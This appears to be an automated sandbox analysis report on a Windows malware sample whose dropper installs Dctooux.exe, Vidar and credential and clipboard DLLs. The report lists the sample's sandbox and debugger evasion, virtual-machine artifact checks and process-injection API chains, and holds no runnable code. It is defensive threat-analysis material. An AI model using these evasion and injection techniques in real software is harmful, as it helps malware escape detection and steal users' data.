Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 180000
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000101001\vidar.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000102011\build.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\build[1].dll Jump to dropped file
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\C4v61Eu50U.exe API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe API coverage: 8.9 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 5752 Thread sleep count: 94 > 30
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 5752 Thread sleep time: -2820000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 764 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe TID: 5752 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Thread delayed: delay time: 30000
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002FC3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000003.2425177632.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Dctooux.exe, 0000001C.00000002.2929110150.0000000002F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DAE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0042F299 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F299
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0043D592 mov eax, dword ptr fs:[00000030h] 0_2_0043D592
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0043982B mov eax, dword ptr fs:[00000030h] 0_2_0043982B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F1374B push dword ptr fs:[00000030h] 0_2_02F1374B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0491D7F9 mov eax, dword ptr fs:[00000030h] 0_2_0491D7F9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048E0D90 mov eax, dword ptr fs:[00000030h] 0_2_048E0D90
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048E092B mov eax, dword ptr fs:[00000030h] 0_2_048E092B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04919A92 mov eax, dword ptr fs:[00000030h] 0_2_04919A92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0043D592 mov eax, dword ptr fs:[00000030h] 20_2_0043D592
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0043982B mov eax, dword ptr fs:[00000030h] 20_2_0043982B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_02E43033 push dword ptr fs:[00000030h] 20_2_02E43033
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0496D7F9 mov eax, dword ptr fs:[00000030h] 20_2_0496D7F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04930D90 mov eax, dword ptr fs:[00000030h] 20_2_04930D90
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0493092B mov eax, dword ptr fs:[00000030h] 20_2_0493092B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04969A92 mov eax, dword ptr fs:[00000030h] 20_2_04969A92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0043D592 mov eax, dword ptr fs:[00000030h] 28_2_0043D592
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0043982B mov eax, dword ptr fs:[00000030h] 28_2_0043982B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_02F0454B push dword ptr fs:[00000030h] 28_2_02F0454B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0313D7F9 mov eax, dword ptr fs:[00000030h] 28_2_0313D7F9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03139A92 mov eax, dword ptr fs:[00000030h] 28_2_03139A92
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0310092B mov eax, dword ptr fs:[00000030h] 28_2_0310092B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03100D90 mov eax, dword ptr fs:[00000030h] 28_2_03100D90
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004420F3 GetProcessHeap, 28_2_004420F3
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0042101F SetUnhandledExceptionFilter, 0_2_0042101F
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004204EC
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DAE
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00420EBA
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04900753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04900753
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0491A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0491A015
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04901121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04901121
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_004204EC
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00439DAE
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00420EBA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04950753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_04950753
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_0496A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_0496A015
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04951121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_04951121
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004204EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_004204EC
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00420EBA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00420EBA
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0042101F SetUnhandledExceptionFilter, 28_2_0042101F
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00439DAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00439DAE
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03121121 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_03121121
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0313A015 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_0313A015
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03120753 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_03120753

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004074F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 0_2_004074F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: unknown unknown
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004210A6 cpuid 0_2_004210A6
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
